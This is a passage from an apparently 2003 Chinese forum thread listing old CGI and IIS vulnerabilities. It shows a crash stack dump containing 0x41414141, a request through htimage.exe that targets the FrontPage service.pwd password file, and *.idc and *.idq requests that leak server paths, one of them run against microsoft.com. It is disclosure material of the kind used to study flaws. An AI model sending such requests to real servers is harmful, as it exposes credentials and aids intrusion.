|
CGI漏洞(19) ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:
Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c server仍旧继续运行,出现 "500 Server Error" 3、可以访问文件,但不可读:
 http://www.xxx.com/cgi-bin/htimage.exe/_vt...service.pwd?0,0
输出:
---------------------------------------------------------------------------
Error
Error calling HTImage:
HTImage.c: Syntax error at line 1 Bad field name, expecting ‘default‘,
‘rectangle‘, ‘circle‘ or
‘polygon‘ (got an alphanumeric string)
---------------------------------------------------------------------------
NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden (发帖时间:2003:9:15 07:43:46)
---玟ζ玟 (5): 三十四.*.idc *.idq 暴露路径:
在IIS4.0中,只要没打services pack5,那么在www下输入这个路径:
http://www.xxx.com/*.idc
将出现: 运行查询错误
无法打开查询文件 e:\web\*.idc。可能是文件不存在或是您没有打开文件所需的许可权。 这个已经在sp5中补掉了
然而在IIS5.0中,这个问题又冒了出来,如微软的主页: http://www.microsoft.com/vstudio/1.idq 将出现: The IDQ file d:\http\products\developer\devonly\prodinfo\vstudio\1.idq
| 
